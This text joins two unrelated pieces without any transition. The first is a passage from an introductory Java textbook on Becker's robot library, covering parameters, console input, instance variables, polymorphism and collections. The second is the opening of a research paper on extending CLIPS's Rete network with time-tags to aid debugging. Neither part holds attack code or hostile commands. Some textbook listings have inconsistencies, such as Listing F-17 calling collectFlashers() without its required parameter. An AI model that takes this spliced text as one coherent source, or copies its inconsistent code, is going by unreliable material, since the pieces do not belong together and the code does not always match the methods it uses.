With this change, the main method tells karel to check four intersections. Similarly, jasmine and pat are told to check five and three intersections, respectively.
Implementing this ability requires communicating the 3, 4 or 5 (or any other number) from the place where `collectFlashers` is called to the place where the number is used – the definition of `collectFlashers`. Adding a parameter to `collectFlashers` facilitates this communication.
We need to make some minor modifications to the definition of `collectFlashers` to receive the parameter given in main. The new version is shown in Listing F-9. The changes from the previous version, described on page 485, are the new parameter in the method header and the loop test that uses it.
**Listing F-9: A more flexible version of `collectFlashers` that uses a parameter.**
```java
1 public void collectFlashers(int numIntersections)
2 {
3 int numMoves = 0;
4 // move one fewer times than there are intersections
5 while (numMoves < numIntersections - 1)
6 { this.pickFlasherIfPresent();
7 this.move();
8 numMoves = numMoves + 1;
9 }
10 this.pickFlasherIfPresent();
11 }
```
numIntersections is like a temporary variable that is automatically assigned a value just before collectFlashers begins to execute. The value it is assigned is the value given between the parentheses when collectFlashers is called. When we write karel.collectFlashers(4), numIntersections will be given the value four. When we write jasmine.collectFlashers(5), then numIntersections will be given the value five.
To check five intersections, the robot needs to move four times, one less than the number of intersections. This observation implies that the loop should execute numIntersections - 1 times. The while loop's test at line 5 takes this into account.
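The relationship between intersections checked and moves made can be verified with a small stand-alone loop. This class is a sketch of mine, mirroring the listing's loop test:

```java
public class MovesCounter {
    // Checking n intersections in a row requires n - 1 moves.
    public static int movesNeeded(int numIntersections) {
        int numMoves = 0;
        while (numMoves < numIntersections - 1) {
            numMoves = numMoves + 1;   // stands in for this.move()
        }
        return numMoves;
    }
}
```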
A complete listing of the class containing main is given in Listing F-10. It uses a new kind of City, shown in Listing F-11. This class uses the same technique we used to extend Robot, this time extending City to add a useful service: placing the flashers. Finally, a complete listing of the Collector robot is given in Listing F-12.
The parameter added in these listings gives collectFlashers a tremendous amount of flexibility. This simple change shifts the service from always checking five intersections to being able to check any number of intersections. You can probably imagine how parameters could be used to make a service that can move a robot any distance or a service that can pick a specified number of things. Eventually, you will be able to write a goto service that directs a robot to go to a particular intersection, no matter where in the city it is (provided nothing blocks it).
Listing F-10: A main method calling services with parameters.
```java
import becker.robots.*;
public class Main extends Object {
public static void main(String[] args) {
ConSite site = new ConSite();
site.placeFlashers();
Collector karel =
new Collector(site, 1, 1, Directions.EAST);
Collector jasmine =
new Collector(site, 1, 2, Directions.EAST);
Collector pat =
new Collector(site, 1, 3, Directions.EAST);
CityFrame frame = new CityFrame(site, 7, 4);
karel.collectFlashers(4);
karel.turnAround();
jasmine.collectFlashers(5);
jasmine.turnAround();
pat.collectFlashers(3);
pat.turnAround();
}
}
```
Listing F-11: A new kind of city with a service to place flashers on the construction site.
```java
import becker.robots.*;
public class ConSite extends City {
public ConSite() {
super();
}
public void placeFlashers() {
Flasher flash01 = new Flasher(this, 2, 1, true);
Flasher flash03 = new Flasher(this, 4, 1, true);
Flasher flash04 = new Flasher(this, 1, 2, true);
Flasher flash06 = new Flasher(this, 3, 2, true);
Flasher flash07 = new Flasher(this, 5, 2, true);
Flasher flash08 = new Flasher(this, 1, 3, true);
Flasher flash10 = new Flasher(this, 3, 3, true);
}
}
```
Listing F-12: A new kind of robot that can collect flashers from a specified number of intersections.
```java
import becker.robots.*;
public class Collector extends Robot {
public Collector(City city, int ave, int str, int dir) {
        super(city, ave, str, dir);
}
public void collectFlashers(int numIntersections) {
int numMoves = 0;
// move one fewer times than there are intersections
while (numMoves < numIntersections - 1) {
this.pickFlasherIfPresent();
this.move();
numMoves = numMoves + 1;
}
this.pickFlasherIfPresent();
}
// pick up a flasher, if one is present on the current intersection
public void pickFlasherIfPresent() {
if (this.isBesideThing(Predicate.aFlasher)) {
this.pickThing(Predicate.aFlasher);
}
}
public void turnAround() {
this.turnLeft();
this.turnLeft();
}
}
```
F.6 Asking the User
The manager of the construction company has expressed appreciation for the flexibility gained by adding the parameter to `collectFlashers`, but she is not quite satisfied. As it stands, the main method always tells `karel` to collect flashers from four intersections, `jasmine` is always told to collect from five intersections, and `pat` is always told to collect from three intersections. The manager would like to vary the instructions each time the program is run. Sometimes `karel` should collect from two intersections and sometimes from forty – depending on the manager’s whim.
We can solve this problem by getting input – a number – from the human who runs the program, storing that number in a temporary variable, and then
passing the number to collectFlashers via a parameter. These changes all take place within the main method.
For each piece of information required, we must do three things:
- tell the user what information is being requested
- get the information from the user, placing it in a temporary variable
- finish getting the current line of information, preparing for the next line
We will repeat these three steps three times, once for each robot. After we have all the information stored in the temporary variables, we can use the variables to tell each of the robots how many intersections to visit.
When the program actually runs, the user will be asked for the information in a separate window, called the console, shown in Figure F-10. The user will likely need to click on the console to bring it to the front before it will accept input from the keyboard. After each number is typed, the user should press the "Enter" key. If the user types something other than an integer (a number without a decimal point), the program will give an error message and stop.
Consider the situation shown in Figure F-10 and suppose the user enters 3 for the last number. When the “Start” button is clicked, the top-most robot will collect flashers from 40 intersections, proceeding off the right edge of the display in the process. The middle robot will collect the flasher from (1,2), proceed to (2,2), and turn around. The bottom robot will collect the flashers from three intersections, and then turn around.
So what does the code to do this look like? For each of the three steps listed earlier we would write instructions like this:
```java
System.out.print("Number of intersections karel should check: ");
int kNum = in.readInt();
in.readLine();
```
The first line uses a special object, `System.out`, to print a message on the console window. The object's `print` service simply prints the characters that appear between the double quotes in its parameter.
The second line does two things. First, it creates a new temporary variable, `kNum`, the number of intersections `karel` should check for flashers. Then it uses an object named `in` to get a number from the user, putting the number it gets into `kNum`. In Figure F-10 the user has entered the number 40; the `readInt` service gets this number and places it in `kNum`.
In the third line, the `readLine` service is used to process the rest of the line where the user entered the number 40, preparing for the next cycle of asking for information and getting it.
These three lines of code use two objects, `System.out` and `in`. `System.out` is a special object that is automatically constructed when the program starts. Its primary service is `print`. The other object, `in`, must be constructed by the programmer before it is used. Its construction is similar to the construction of `Robot` or `City` objects except that the name of the class is `TextInput`:
```java
TextInput in = new TextInput();
```
The `TextInput` class must be imported before it can be used. Include
```java
import becker.io.TextInput;
```
at the beginning of the file using the `TextInput` class.
Finally, the number stored in the temporary variable `kNum` can be given to the `collectFlashers` method with the statement
```java
karel.collectFlashers(kNum);
```
This directs `karel` to check 40 intersections for flashers, assuming the interaction shown in Figure F-10.
Listing F-13 shows how to integrate this new code into the `main` method.
Listing F-13: A program which asks the user how many intersections each robot should check.
```java
import becker.robots.*;
import becker.io.*;
public class Main extends Object {
public static void main(String[] args) {
// Construct the site, the robots, and the frame as in Listing F-10
TextInput in = new TextInput();
System.out.print("Number of intersections karel should check: ");
int kNum = in.readInt();
in.readLine();
System.out.print("Number of intersections jasmine should check: ");
int jNum = in.readInt();
in.readLine();
System.out.print("Number of intersections pat should check: ");
int pNum = in.readInt();
in.readLine();
karel.collectFlashers(kNum);
karel.turnAround();
jasmine.collectFlashers(jNum);
jasmine.turnAround();
pat.collectFlashers(pNum);
pat.turnAround();
}
}
```
Using `System.out` and a `TextInput` object provides many opportunities for interactions between programs and users. A robot program might ask the user where a robot should be placed or how many things to collect. A banking program might ask the user how much money to transfer between accounts or an e-mail program might ask for the address where a message should be sent. In each of these cases, the program tells the user what information is needed, the user types it in, and then the program reads the information, using the services of an object such as `TextInput`.
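`TextInput` ships with the becker library. With only the standard library, `java.util.Scanner` can play a similar role; the sketch below is my own analog of the three-step pattern (prompt, read, finish the line), not code from the book:

```java
import java.util.Scanner;

public class AskUser {
    // Prompt the user, read an integer, and finish the current line,
    // like TextInput's readInt followed by readLine.
    public static int readCount(Scanner in, String prompt) {
        System.out.print(prompt);
        int n = in.nextInt();
        in.nextLine();   // consume the rest of the line
        return n;
    }

    public static void main(String[] args) {
        Scanner in = new Scanner(System.in);
        int kNum = readCount(in, "Number of intersections karel should check: ");
        System.out.println("karel will check " + kNum + " intersections.");
    }
}
```

A Scanner can also read from a String, which makes this method easy to exercise without a keyboard.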
This style of interaction is simple and easy to implement, but has been superseded in many programs by windows, dialog boxes, buttons, mice, and so on. We will, in time, learn how to interact with users via a graphical user interface as well.
F.7 Objects That Remember
karel was accidentally moved into a wall and has broken beyond repair. Rather than replacing karel with a new robot, the construction company’s management has decided that jasmine will collect the flashers from both streets. However, because jasmine and pat are now doing significantly different amounts of work, they must be on different maintenance schedules. Management wants each robot to keep track of how many flashers it has collected, printing out the number at the end of each job.
The main method shown in Listing F-13 must be modified by removing the statements that refer to karel and replacing the statements that direct jasmine and pat with the following. These statements direct jasmine to
- collect the flashers from one street,
- go to karel’s former street and collect flashers there, and,
- print out the number of flashers collected.
pat then collects flashers and also prints out the total number it collected.
```java
jasmine.collectFlashers(jNum);
jasmine.turnLeft();
jasmine.move();
jasmine.turnLeft();
jasmine.collectFlashers(jNum);
jasmine.turnAround();
System.out.print("jasmine collected ");
System.out.println(jasmine.numFlashersCollected());
pat.collectFlashers(pNum);
pat.turnAround();
System.out.print("pat collected ");
System.out.println(pat.numFlashersCollected());
```
Figure F-11 shows the path the robots take when this program is run. It also shows the console window displaying the number of flashers each robot collected.
This program requires two changes to the Collector class. First, it must be modified to remember the number of flashers collected. Second, a query, numFlashersCollected, must be added to retrieve the number so it can be printed.
At first, we may think that all we need is a temporary variable to remember the number of flashers a robot has collected. This will not work, however, because a temporary variable exists only as long as the service containing it executes – then the variable and the value it contained are gone. jasmine, however, will execute collectFlashers twice before we ask for the number of flashers collected. A temporary variable inside collectFlashers could not keep a running total across both uses of the service.
An instance variable, however, will do what we need. In many ways, an instance variable is like a temporary variable. Both remember information such as a number. Both kinds of variables can have the information they store changed, perhaps by adding one to the number already stored there. The information stored in both kinds of variables can be printed on the console or passed as a parameter to a service.
There are, however, two crucial differences. First, a temporary variable is temporary. It only lasts as long as the method containing it; sometimes even less. An instance variable, on the other hand, lasts as long as the object lasts. An instance variable in jasmine will be created when the object is created and will continue to remember information until jasmine is no longer needed.
Second, a temporary variable can only be used in the method where it is created. An instance variable may be used anywhere in the class containing it. Each object created from the class will have its own instance variable. jasmine will have one instance variable and pat will have another. This duplication enables jasmine and pat to each count the flashers they have picked up, each completely independent from the other.
These three properties are crucial to solving the problem of remembering how many flashers have been collected. First, because instance variables last as long as the object, each time collectFlashers is called the count can continue from where it left off the previous time. Second, because instance variables can be used in any method in the class, we can write a separate method that returns the current value of the instance variable. Third, because each object has its own instance variable, jasmine and pat can each keep track of their own work.
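Stripped of the robot machinery, these properties can be demonstrated with a plain class of my own invention; each object gets its own copy of the instance variable, and the count survives across method calls:

```java
public class Counter {
    // Instance variable: created with the object, lasts as long as the object.
    private int count = 0;

    public void record() {
        this.count = this.count + 1;   // keeps a running total across calls
    }

    public int total() {
        return this.count;
    }
}
```

Two Counter objects count independently, just as jasmine and pat each track their own work.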
Listing F-14 shows how to use an instance variable named flasherCount to remember how many flashers have been collected. The only differences between Listing F-14 and the previous version in Listing F-12 are the declaration of flasherCount, the statement that increments it, and the new numFlashersCollected query.

Listing F-14: Modifications to Collector to remember the number of flashers collected.
```java
import becker.robots.*;

public class Collector extends Robot {

    private int flasherCount = 0;

    public Collector(City city, int ave, int str, int dir) {
        super(city, ave, str, dir);
    }

    public void collectFlashers(int numIntersections) {
        int numMoves = 0;
        // move one fewer times than there are intersections
        while (numMoves < numIntersections - 1) {
            this.pickFlasherIfPresent();
            this.move();
            numMoves = numMoves + 1;
        }
        this.pickFlasherIfPresent();
    }

    // pick up a flasher, if one is present on the current intersection
    public void pickFlasherIfPresent() {
        if (this.isBesideThing(Predicate.aFlasher)) {
            this.pickThing(Predicate.aFlasher);
            this.flasherCount = this.flasherCount + 1;
        }
    }

    // answer how many flashers this robot has collected so far
    public int numFlashersCollected() {
        return this.flasherCount;
    }

    public void turnAround() {
        this.turnLeft();
        this.turnLeft();
    }
}
```
The instance variable flasherCount is declared inside the class, but outside of all the methods. It is declared just like a temporary variable except for the keyword private at the beginning of the line.

flasherCount starts out with a value of 0 when the robot object is created. Just after a flasher is picked up in pickFlasherIfPresent, the instance variable is incremented. Incrementing flasherCount is very similar to incrementing the temporary variable in collectFlashers, except that we use the keyword this to emphasize that flasherCount is something that belongs to the object, much like move, turnLeft, and collectFlashers belong to the object.

The numFlashersCollected method provides a query answering the question of how many flashers the robot has collected so far. It is like other methods except that it says what kind of answer it returns, an integer (abbreviated int). It also includes an instruction to return the answer, the value contained in flasherCount, to the client that called the query.
There are many times when an object may want to remember information for a long time. A robot may want to remember how far it has traveled or the location of a Thing representing a pot of gold. An object representing a bank account will need to remember the balance for as long as it exists. An Employee object should remember the employee’s starting date and annual salary, no matter which of many possible services is being executed – or even if no service is being executed at the moment.
On the other hand, if the information is only needed in a single method, an instance variable is more powerful than is needed. A temporary variable is likely a better choice.
F.8 The Same, But Different
The paving project is nearly complete. Workers have put up streetlights on a number of the intersections; flashers remain on some of the rest (see Figure F-12). jasmine and pat have been moved to a different site and three new robots (sam, migel, and laura) are being used to turn the lights off each morning – both the flashers and the streetlights. sam, migel, and laura are instances of Extinguisher robots that include a service named turnLightsOff. Like collectFlashers, turnLightsOff has a parameter that says how many intersections the robot should visit.
To turn off a flasher, turnLightsOff could have code like this:
```java
Flasher f = (Flasher)this.examineThing(Predicate.aFlasher);
f.turnOff();
```
this.examineThing instructs this robot to examine the intersection it occupies for a Thing. In particular, the parameter, Predicate.aFlasher, tells it to look for a flasher. If the robot finds a flasher on the intersection, it assigns it to the temporary variable, f.
Similar code could be used to turn off a streetlight, except that we have to specify that we are interested in Streetlight objects.
```java
Streetlight s = (Streetlight)this.examineThing(Predicate.aStreetlight);
s.turnOff();
```
There is one restriction on this code. If the intersection does not actually have a streetlight, the program will produce a run-time error when it tries to turn off the non-existent streetlight. One way to fix this problem is to use an if statement to only execute this code if the robot is beside a streetlight.
These ideas can be combined to create a `turnLightsOff` method. It is shown in Listing F-15, together with a helper method.
The `turnLightsOff` method is very, very similar to the `collectFlashers` method. The difference is what happens on each intersection. Instead of calling `pickFlasherIfPresent`, `turnLightsOff` calls the method `turnLightsOffHere`.
When the `turnLightsOffHere` method executes, it first checks if the intersection has a flasher. If so, the robot gets the flasher and calls its `turnOff` method. Then the robot checks for a streetlight. If there is a streetlight, the robot gets it and calls its `turnOff` method.
It is no coincidence that flashers and streetlights are both turned off with a method named turnOff. Recall from Section G.1 that we extended the Robot class to create a new kind of robot, a Collector. A Collector robot had all of the methods a regular Robot has: move, pickThing, putThing, and so on. It was also customized to include a new method, collectFlashers.
Flasher and Streetlight both extend the class Light. The Light class contains the methods turnOn and turnOff. The Flasher and Streetlight classes both inherit these methods. Just as a Collector robot can move, thanks to the move method inherited from Robot, a Flasher and a Streetlight can be turned on or off, thanks to the turnOn and turnOff methods inherited from Light.
Looking at these classes another way, Flasher and Streetlight are both a kind of Light. Therefore, they must be able to be turned on and off.
This yields an interesting idea. Perhaps we can instruct the robot to examine the intersection for a light. Not a flasher, in particular, nor a streetlight in particular, but just a light.
```java
Light lite = (Light)this.examineThing(Predicate.aLight);
lite.turnOff();
```
This, in fact, does work. The eight lines of code in the turnLightsOffHere method, shown in Listing F-15, can be cut to just four lines, as shown in Listing F-16.
In some ways, it is surprising that this code works. After all, there are differences between streetlights and flashers. When a Streetlight is on, it just shines gently. When a flasher is on, it flashes insistently. It seems reasonable that these differences in behavior would result in differences in the turnOff methods – a streetlight would turn itself off differently than a flasher would turn itself off.
This is the case. The definition of turnOff for a Streetlight is
```java
public void turnOff()
{   this.setIcon(this.offIcon);
}
```
while the definition of turnOff for a Flasher is
```java
public void turnOff()
{   FlasherIcon fi = (FlasherIcon)this.getIcon();
    fi.stop();
    this.on = false;
}
```
Java allows a class to override methods in the class it extends. Flasher can replace the turnOff method inherited from Light with its own version, as can Streetlight. Then, when the statement
```java
lite.turnOff();
```
is executed, lite might be a Flasher object or lite might be a Streetlight object. But it doesn’t matter. Each object will use its own turnOff method. A Flasher will turn off one way; a Streetlight will turn off another way. They are the same – they both turn off – but they are
also different – they turn off in different ways. This concept of having the same service behave differently, depending on the class, is called polymorphism.
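A self-contained sketch of the idea, using invented stand-ins for Light, Flasher, and Streetlight (the real classes' internals differ, and here turnOff returns a description instead of changing an icon):

```java
public class PolymorphismDemo {
    public static class Light {
        public String turnOff() { return "light off"; }
    }

    public static class Streetlight extends Light {
        @Override
        public String turnOff() { return "streetlight stops shining"; }
    }

    public static class Flasher extends Light {
        @Override
        public String turnOff() { return "flasher stops blinking"; }
    }

    // The caller treats every light the same; each object runs its own turnOff.
    public static String extinguish(Light lite) {
        return lite.turnOff();
    }

    public static void main(String[] args) {
        System.out.println(extinguish(new Streetlight()));
        System.out.println(extinguish(new Flasher()));
    }
}
```

The extinguish method never asks which kind of light it was given, yet each object turns off its own way.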
Polymorphism is useful when you have different kinds of objects that need to perform variations of the same basic action. For example, you might have two different kinds of dancing robots. A left-dancing robot moves to the left, forward, and then back to the right when sent the move message. A right-dancing robot moves to the right, forward, and then to the left when it moves. Both respond to the move message, but move differently.
As another example, consider an Employee class that is extended in two different ways: HourlyEmployee and SalariedEmployee. Every Employee should have a calcWages method, but HourlyEmployee and SalariedEmployee calculate the answer differently. Fortunately, the code
```java
Employee e = (Employee)this.getNextEmployee();
e.calcWages();
```
will use the correct calculation whether e is an HourlyEmployee or a SalariedEmployee.
Or, consider programs such as Windows Media Player or RealPlayer that can play downloaded music or videos. If the user selects a music file, the play method in the Music class is executed. If the user selects a video file, the play method in the Video class is executed. This could be implemented by having Music and Video both extend a class named Media, which has a play method. Then, no matter what kind of media the user has selected, the lines
```java
Media selected = (Media)this.getUsersSelection();
selected.play();
```
will cause the right play method to be executed. Thanks to polymorphism, each object can execute a method in an appropriate manner without the client even needing to know what kind of object it is. Polymorphism allows the code calling a method to treat objects in the same way, even if the objects belong to different classes.
F.9 Collections
The original paving job is finished and the construction company has landed another contract. This time the contract is much larger – a huge subdivision consisting of fifty streets. As before, robots are required to collect the flashers from the intersections each morning.
Working with fifty robots on fifty streets raises two issues. First is the tedium of coming up with the names for fifty robots. Second is the large amount of code that is exactly the same except for the name of the robot involved.
Using only the techniques we have learned so far, the main program would have to be written as shown in Listing F-17.
Listing F-17: A naïve program directing 50 robots to collect flashers on 50 streets.
```java
import becker.robots.*;
public class Main{
public static void main(String[] args)
{
ConSite site = new ConSite();
Collector worker_0 =
new Collector(site, 1, 1, Directions.EAST);
Collector worker_1 =
new Collector(site, 1, 2, Directions.EAST);
Collector worker_2 =
new Collector(site, 1, 3, Directions.EAST);
...
Collector worker_48 =
new Collector(site, 1, 49, Directions.EAST);
Collector worker_49 =
new Collector(site, 1, 50, Directions.EAST);
CityFrame frame = new CityFrame(site);
worker_0.collectFlashers();
worker_0.turnAround();
worker_1.collectFlashers();
worker_1.turnAround();
worker_2.collectFlashers();
worker_2.turnAround();
...
worker_48.collectFlashers();
worker_48.turnAround();
worker_49.collectFlashers();
worker_49.turnAround();
}
}
```
Using numbers in the names of the robots makes the similarity of many lines obvious. One might wonder if we can make use of all that similarity.
In fact, we can. There are various ways to collect many objects, such as robots, together. The result is called a collection. Collections are used by giving the name of the collection together with a number. For example, suppose the collection is named workers and already contains the fifty robots. Then the robot stored at position 5 (positions start at 0) could be told to collect flashers and turn around with the following code:
```java
Collector worker = (Collector)workers.get(5);
worker.collectFlashers();
worker.turnAround();
```
This doesn’t seem to be useful until we realize that the 5 can be replaced with a variable. If we put these three lines inside a loop that counts from 0 to 49, then 50 robots will collect flashers and then turn around! All with just the following 7 lines of code (instead of the 100 required in Listing F-17).
```java
int workerNum = 0;
while (workerNum < 50)
{ Collector worker = (Collector)workers.get(workerNum);
worker.collectFlashers();
worker.turnAround();
workerNum = workerNum + 1;
}
```
The beauty of this approach is that 1,000 robots could be told to collect flashers with the same seven lines of code. Only the 50 in the second line would need to change.
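One standard way to build such a collection is java.util.ArrayList. The Worker class below is an invented stand-in for Collector so the sketch runs without the robot library:

```java
import java.util.ArrayList;

public class Crew {
    // A stand-in for Collector that just counts how often it was told to work.
    public static class Worker {
        public int jobsDone = 0;
        public void collectFlashers() { this.jobsDone = this.jobsDone + 1; }
    }

    // Build a collection of workers, then tell each one to collect flashers once.
    public static int dispatchAll(int numWorkers) {
        ArrayList<Worker> workers = new ArrayList<Worker>();
        for (int i = 0; i < numWorkers; i++) {
            workers.add(new Worker());
        }
        int workerNum = 0;
        while (workerNum < workers.size()) {
            Worker worker = workers.get(workerNum);
            worker.collectFlashers();
            workerNum = workerNum + 1;
        }
        int total = 0;
        for (Worker w : workers) {
            total = total + w.jobsDone;
        }
        return total;
    }
}
```

Using workers.size() as the loop bound means the same loop serves 50 workers or 1,000 with no change at all.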
Collections are often used in programs. Each robot uses a collection to implement its “backpack” and the City class uses a collection to manage all the things it contains — robots, walls, flashers, and so on. Programs used at a bank use collections to keep track of all the different Account objects and payroll programs use collections of Employee objects. Word processors use collections to store many Paragraph objects and all the words in the spelling checker’s dictionary.
Any time a program must use many similar objects or similar pieces of information, a collection is probably being used.
Abstract. To debug a CLIPS program, certain 'historical' information about a run is needed. It would be convenient for system builders to be able to ask questions requesting such information. For example, system builders might want to ask why a particular rule did not fire at a certain time, especially if they think that it should have fired then, or they might want to know at what periods during a run a particular fact was in working memory. It would be less tedious to have such questions directly answered, instead of having to rerun the program one step at a time or having to examine a long trace file.
This paper advocates extending the Rete network used in implementing CLIPS by a temporal dimension, allowing it to store 'historical' information about a run of a CLIPS program. We call this extended network a historical Rete network. To each fact and instantiation are appended time-tags, which encode the period(s) of time that the fact or instantiation was in effect. In addition, each Rete network memory node is partitioned into two sets: a current partition, containing the instantiations currently in effect, and a past partition, containing the instantiations which are not in effect now, but which were earlier in the current run. These partitions allow the basic Rete network operation to be surprisingly unchanged by the addition of time-tags and the resulting effect that no-longer-true instantiations now do not leave the Rete network.
We will discuss how historical Rete networks can be used for answering questions that can help a system builder detect the cause of an error in a CLIPS program. Moreover, the cost of maintaining a historical Rete network is compared with that for a classical Rete network. We will demonstrate that the cost for assertions is only slightly higher for a historical Rete network. The cost for handling retractions could be significantly higher; however, we will show that by using special data structures that rely on hashing, it is also possible to implement retractions efficiently.
I. INTRODUCTION
One of the activities of a system builder developing any kind of software is debugging, "the process of locating, analyzing, and correcting suspected faults" ([IEEE 1989], p. 15). So, first, the system builders notice, one way or another, that there is a manifestation of an error in the program. Then, they debug by finding, and then correcting, the cause(s) of that particular error. In a forward-chaining rule-based language such as CLIPS ([Giarratano 1989], (COSMIC 1989)), a program's data-driven execution affects the process of debugging.
In a CLIPS program, data changes determine what happens next. One of the rules whose left-hand-side conditions are all satisfied will be chosen to have its right-hand-side actions executed. Those actions may change working memory, causing some previously-unsatisfied rules to now be satisfied, and vice versa. So, the choice of which rule to fire determines which rules will have a chance to fire next, and so affects what can happen next. To debug such a program, the system builders need detailed information about what happened during its run, including the order in which rules were executed, and when certain data were (or were not) in working memory. This historical information about a run will be necessary to discover why the program executed as it did.
Particularly for large CLIPS programs, system builders armed only with those tools currently provided have a tedious job ahead. CLIPS allows one to run a program one rule-firing at a time (or, it allows one to single-step through a program), and to check what is in memory or in the agenda, the ordered list of rules currently eligible to fire. CLIPS can also be directed to display a trace of rule-firings and/or of working memory changes for system builder use. So, to find out, for example, when a fact was in working memory, we can carefully examine a possibly-long trace of assertions to and retractions from working memory, or we can single-step through the program, and ask to see the current list of facts when we reach various points at which we suspect that the fact is true. To find out why a rule did not fire at a particular time, we can single-step through the program up to that time, and then try to determine, from the agenda and working memory contents, why this rule did not fire then. We can find out such information using the current tools, but we may also easily overlook details in the sheer volume and monotony of the data.
CLIPS' current debugging tools are not very different from those found for other, similar forward-chaining rule-based languages. Evidence that these tools are not sufficient can be found in the current research trying to ease the debugging of large forward-chaining programs. (Domingue and Eisenstadt 1989) presents a graphics-based debugger, while (Barker and O'Connor 1989), (Jacob and Froscher 1990), (Eick et al. 1989), and (Eick 1991) suggest changes to rule-based languages, such as the addition of rule-sets, that might, among other goals, ease debugging, changing, and maintaining rule-based programs.
We would like to explore a slightly different approach to debugging: how explanation can be used in debugging CLIPS programs. The explanation subsystem envisioned will allow system builders to ask questions on the top level of CLIPS about the latest run of a program, which the system then answers, instead of requiring the system builders to run the program again, single-stepping through it, or to pore over the system trace. This explanation, designed with the problems of forward-chaining rule-based program debugging in mind, would be a useful addition to the current debugging facilities provided by CLIPS.
Many questions useful for debugging deal with the aforementioned historical details of a run. For example, system builders might ask which fired rule's right-hand-side actions contributed a particular fact to working memory, allowing it to trigger some other rule. They might ask which fired rules needed a particular fact to be true for their left-hand-side conditions to be satisfied; this gives them an idea of that fact's impact. They might ask why a particular rule did not fire at a certain time, especially if they think that it should have fired then. These questions can be answered using the current CLIPS facilities, by single-stepping through a run or by studying a trace, but the tedium would be reduced if the questions could be directly answered instead. However, one of the first hurdles to answering such questions is determining how to store and maintain a run's historical information.
CLIPS uses an inference network to efficiently match left-hand-side (or LHS) rule conditions to facts; in particular, it uses the Rete algorithm ((Forgy 1982), (Scales 1986)) for this matching. Basically, in the Rete algorithm, a network of all the LHS conditions from all the rules is built, which includes tests both for each LHS condition appearing in any rule, and for certain combinations of conditions within rules. When a fact matches a LHS condition, an instantiation — indicating that this condition is satisfied by this fact — is stored in the network; instantiations are also stored for combinations of LHS conditions satisfied by sets of facts. A rule instantiation represents a collection of facts that satisfies all of the rule's LHS conditions. Then, as each new fact is asserted, it is sent through the network. As a result of this propagation, rules may become eligible to be fired, if this fact's assertion causes instantiations of those rules to be created. Likewise, rule instantiations may be removed because of this fact's assertion, if the rule contains a LHS condition requiring that this fact not be true. When facts are retracted from working memory, that is also propagated through the network, causing the removal of instantiations including the now-retracted fact.
In this paper, a generalization of the Rete network, called a historical Rete network, is proposed that allows the storing and maintenance of historical information for a single
run of a CLIPS program. We have two main objectives in modifying Rete for this purpose: CLIPS programs using the modified network must still run almost as efficiently as before the modifications, so that run-time operation during program development is not overly impeded, and the modified network should allow reasonable maintenance and retrieval of a program run's historical information. Since the Rete network implements rule instantiations, it is feasible to 'tag' condition and rule instantiations with when they occurred during a run. Including this information within the network will allow us to design top-level explanation facilities that can more easily and efficiently answer 'historical' questions about a run, and thus ease the task of debugging for system builders. Storing and maintaining this information is just one of several components in providing such explanation, but it is a necessary and important aspect.
The rest of the paper will be organized as follows. Section 2 briefly introduces the Rete algorithm, then discusses our use of rule-firings as the basis for time, and then describes how time-tags, along with current and past partitions, can be used to store CLIPS program run history. Since some questions that a system builder might ask would involve knowing what the agenda looked like at a certain time, section 3 covers how an agenda copy may be reconstructed on demand. Section 4 then briefly describes how historical information about a program run may be retrieved in the context of gathering data for answering several different kinds of questions useful for debugging. Finally, section 5 concludes the paper.
II. MODIFICATIONS TO THE RETE NETWORK
A. Introduction to Rete Networks
Before discussing the necessary structural changes, we will briefly review 'normal' Rete networks. (For a fuller description, see (Forgy 1982), (Scales 1986), and (Gupta 1987).) In a Rete network, there are three kinds of memory nodes: alpha nodes, beta nodes, and production nodes. (For simplicity, 'node' will stand for test nodes along with their corresponding memory.) There is an alpha node for each LHS condition; the alpha node stores an instantiation for each fact matching this condition. A beta node contains instantiations representing two or more consistently-satisfied LHS conditions from a particular rule (or rules), and a production node holds instantiations that satisfy all of the LHS conditions of a rule.
In a Rete network, two alpha nodes representing rule conditions are joined into a beta node, containing instantiations that consistently represent both conditions being true. Then that beta node is (typically) joined with another alpha node into another beta node, containing instantiations that consistently represent these three conditions being true, and so on until all of a rule's LHS conditions have been represented, at which point, instead of leading to a beta node, a beta node and alpha node are joined into a production node, containing 'complete' rule instantiations that are eligible to fire. And, when it is being built, as conditions are added to the network, each condition appears in the network only once; if it is used in several rules, then that alpha node has a number of successors, and likewise, if a set of conditions appears in several rules, the section of the Rete network leading to a beta node representing that set of conditions may also be shared among several rules.
Figure 1 shows a simplified Rete network for a single CLIPS rule, rule-13, given in Table 1. (We will use facts, instead of fact-ids, in instantiations in most of the figures, for greater clarity.) Each of the three LHS conditions in rule-13 has a corresponding alpha node that tests for matches and stores an instantiation of each matching fact. So, we see in Figure 1 that working memory fact (p 1 3) matches rule-13's LHS condition (p ?X ?Y), that fact (q 3 5) matches (q ?Y ?Z), and that fact (r 1 7) matches (r ?X ?Q). The first two conditions are then joined into a beta node, which tests if any of the facts matching those two conditions are compatible, and then stores any combinations passing the test. (p 1 3) and (q 3 5) both match their respective conditions with ?Y = 3, so an instantiation for that pair is stored in the beta node. Then, that beta node is joined with the remaining condition, and since
this is the last condition, any instantiations resulting from these compatibility tests will be instantiations for rule-13, stored in a production node. The variable \(?X\) is 1 in both the beta node's only instantiation and in \((r \ ?X \ ?Q)\)'s only instantiation, so they can be combined into a compatible instantiation for the entire rule, and so an instantiation is stored in rule-13's production node.
---

### Table 1. A CLIPS rule

```
(defrule rule-13
    (p ?X ?Y)
    (q ?Y ?Z)
    (r ?X ?Q)
    => ...)
```

---

### Figure 1. A 'regular' Rete network

[Figure: alpha nodes for the conditions (p ?X ?Y), (q ?Y ?Z), and (r ?X ?Q), matched by the working-memory facts (p 1 3), (q 3 5), and (r 1 7); the first two alpha nodes join into a beta node holding the instantiation (p 1 3)(q 3 5), which joins with the third alpha node into rule-13's production node holding (p 1 3)(q 3 5)(r 1 7).]
In general, when a fact is asserted, it is added to the working memory element (or wme) hash table, which stores all the facts currently in working memory. Each wme hash table entry includes pointers to all of the LHS conditions (or, alpha nodes) in the Rete network that match this fact; these pointers allow us to avoid another search of all the conditions if the fact is later retracted. The newly-asserted fact is then compared to every alpha node, and, if the fact matches that LHS condition, an instantiation is stored in the alpha node, and a pointer to this alpha node is stored in the fact's wme hash table entry. We then visit all of that alpha node's successors, seeing if the new instantiations in a node result in new consistent instantiations at the succeeding node. Any new rule instantiations added to production nodes are added to the agenda.
